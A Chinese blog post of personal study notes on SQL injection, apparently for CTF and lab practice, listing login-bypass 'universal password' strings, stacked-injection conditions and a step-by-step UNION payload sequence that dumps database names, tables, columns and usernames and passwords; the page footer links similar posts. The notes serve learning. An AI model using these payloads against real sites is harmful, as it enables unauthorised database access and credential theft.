SQL注入学习笔记(一)

已于 2024-09-25 17:06:25 修改
阅读量614 收藏 1
点赞数 8
分类专栏: Web安全 文章标签: 学习 笔记
于 2024-09-17 21:09:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68491709/article/details/142318678
版权

(仅供自己记录并复习学习内容 )

1.万能密码

先确认闭合方式,为1或’1‘或“1”

对应得到万能密码a or true #或a' or true #或a“ or true #

原理为先确认闭合方式,再通过截断使正常sql查询语句失效

2. 堆叠注入

通过传入结束符;+新的sql语句来获取想要的信息——通过结束符同时执行多条sql语句

使用条件较为苛刻:

(1)有sql注入漏洞

(2)可以同时执行多条sql语句

(3)结束符未被屏蔽

 3.传统注入思路

(0)先确定是否存在sql注入漏洞,与sql注入类型

(1)登陆后爆字段。确认有几个字段

1' order by 1 %23
1' order by 2 %23
1' order by 3 %23

(2)看回显。意为哪些字段可回显到前端,如果第2,3字段回显,那后续要查找的信息就填在2,3字段

1' union select 1,2,3

(3)爆数据库。得到数据库名

1' union select 1,database(),version()

(4)爆数据库的表。得到表名

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()

(5)爆表的列。得到列名

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='AAA'

(6)读取内容,爆flag

1' union select 1,2,group_concat(id,username,password) from AAA%23&password=1

weixin_68491709
关注
专栏目录
sql注入学习笔记-dvwa实战
xuqide77的博客
03-12 639
目录一、sql注入基础二、sql注入之union注入实战-dvwa1.先判断是数字型还是字符型2.使用order by查询出表的字段数量3.利用联合注入查询数据库名称、表、字段、字段数据 一、sql注入基础 sql注入就是指Web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击可控的,并且参数带入数据库查询,攻击者可以通过构造不同的sql语句来实现对数据库的任意操作。 sql注入漏洞的产生需要满足两个条件 (1)参数用户可控:前端传给后端的参数内容是用户可以控制的 (2)参数带入数据库查询:
SQL注入(自学笔记
woqusss的博客
08-10 419
SQL注入当属漏洞之王,具有高危害性,且利用条件低,利用以及绕过检测方式多种多样。这篇笔记主要从SQL注入的危害性,以及SQL注入的条件,注入点的判断以及寻找,注入的方式以及类型,不同业务场景下对应的不同query方式利用,成功注入后应该进行的步骤,在具有root高权限账户时候应该进行的操作下,防御以及后端过滤方式和Waf绕过,一些本人见过的查询语句闭合方式。...
SQL注入
最新发布
放弃幻想,准备斗争
04-19 2330
实际上这个过程是,admin'# 作为用户名登录后,数据库对该用户名,密码信任,实际上这个用户名被代码替换后,登录的不是admin'# ,而是admin。修改的是admin的密码,这就是二阶注入的原理。所谓的二阶注入,利用的是,数据库系统对已有信息的“信任”,将注入的用户名输入到系统后,利用这种信任,登录到数据库其他用户,比如admin'#成功注册后,但是登录的却是admin。此时,username为8 ,根据or的运算,3=3是永真式,#将后半句注释了,故这句代码执行结果永远为真,可以登录成功。
sql注入万能密码
05-19
sql注入万能密码 全部的万能代码 如"or "a"="a 等等很多
sql注入万能密码总结
热门推荐
weixin_45778886的博客
12-03 1万+
万能密码 万能密码原理 原验证登陆语句: SELECT * FROM admin WHERE Username= '".$username."' AND Password= '".md5($password)."' 输入 1′ or 1=1 or ‘1’=’1万能密码语句变为: SELECT * FROM admin WHERE Username='1' OR 1=1 OR '1'='1' AND Password='EDFKGMZDFSDFDSFRRQWERRFGGG' 即得到优先级关系:or&lt
sql注入万能密码总结
坚持硬核
01-30 3735
select * from admin where username='' and password ='' 第一种: 当你已知管理员账号名为admin时可以直接尝试 admin' # select * from admin where username='admin' #'and password='' 一些事实: mysql在处理弱类型的时候,比如说非数字开头的字符串和数字相加,字符串会被认为是0 证明:非数字开头的字符串和0是相等的 数字开头的字符串: 也就说: selec
SQL注入(万能密码)
qq_69432323的博客
03-14 6242
SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)
简述sql注入万能密码的原理
weixin_57108799的博客
02-17 983
sql万能密码原理
sql注入笔记
03-15
SQL 注入笔记 SQL 注入是一种常见的 Web 应用程序漏洞,攻击者可以通过inject恶意 SQL 代码来访问、修改或控制数据库中的数据。本文将详细介绍 SQL 注入的基本概念、检测方法和防御策略。 什么是 SQL 注入? SQL ...
sql注入学习笔记(一)
w17691058648x的博客
03-11 766
SQL注入:将sql语句注入进web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 具体来说就是讲sql语句注入进后台数据库中,从而达到盗取数据库数据的目的。 URL:同一资源定位符 http:// 192.168.246.130/sqli-labs-master/Less-1/ 协议 IP地址或域名...
CTFHub技能树.Web.SQL注入 WriteUp与SQL注入学习笔记
qq_45716477的博客
04-19 608
目录Level 1整数型注入字符型注入报错注入布尔盲注时间盲注欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 Level 1 整数型注入 输入1 and 1=1 和1 and 1=2 输
SQL注入-万能密码注入原理
godHhh的博客
08-01 8185
用户进行用户名和密码验证时,网站需要查询数据库。查询数据库就是执行SQL语句。 用户登录时,后台执行的数据库查询操作(SQL语句)是: 【Select user_id,user_type,email From users Where user_id=’用户名’ And password=’密码’】。 2.由于网站后台在进行数据库查询的时候没有对单引号进行过滤,当输入用户名【admin】和万能...
SQL注入万能密码登录
山兔的博客
10-26 4334
今天的靶机是一个主要面向web应用程序的框架。更具体地说,我们将了解如何对启用了SQL数据库的web应用程序执行SQL注入。我们的目标是具有针对后端数据库的搜索功能的网站,该数据库包含易受此攻击的可搜索项目攻击类型。任何用户都不应该看到此数据库中的所有项目,因此网站将为我们提供不同的搜索结果。SQL 服务通常如何运行的一个很好的例子是用于任何用户的登录过程。每次用户要登录时,Web 应用程序都会将登录页输入(用户名/密码组合)发送到 SQL 服务,并将其与该特定用户的存储数据库条目进行比较。
【万字长文】SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了
Libra1313的博客
03-17 9428
之前一直有粉丝朋友,在挖漏洞过程中使用到SQL注入,希望大白给他讲解一些的SQL注入,今天大白也特地给粉丝朋友安排好了SQL注入攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注。
SQL注入万能密码的原理详解
Yuppie001的博客
11-26 3142
2.然后再通过#将后面的password注释掉,这样整个查询条件为真,相当于where条件没了,查询整个字段的数据。注:在现在的应用程序已经很难用万能密码进行绕过了,本篇文章仅仅讨论万能密码绕过的原理。我们直接使用万能密码:admin’ or 1=1 #进行绕过,密码随便输。1.用户通过表单输入用户名和密码,并且该表单通过POST方法提交到服务器。由于本次只讲解万能密码的原理,后面的步骤就不具体演示了。具体的原理知道了,你也来构造一个万能密码把!可以发现需要登录用户名和密码来进行登录。
网安入门06-Sql注入(时间盲注&万能密码
m0_61499194的博客
12-25 491
​ 以第9关为例:无论输入任何参数,页面显示一样,没有两种状态可以判断,无法使用布尔盲注 万能密码 Less11 使用恒成立的sql语句来进入后台 还可以继续手工注入 Less12 先判断是否存在注入点 再找出显示位(回显点) Less15,16 不提供报错信息,需要布尔盲注,不深究了 ​
0基础学习SQL注入之万能账号密码(BUUctf例题-[极客大挑战 2019]EasySQL1)
weixin_49765221的博客
04-12 1512
sql注入学习
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入学习过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值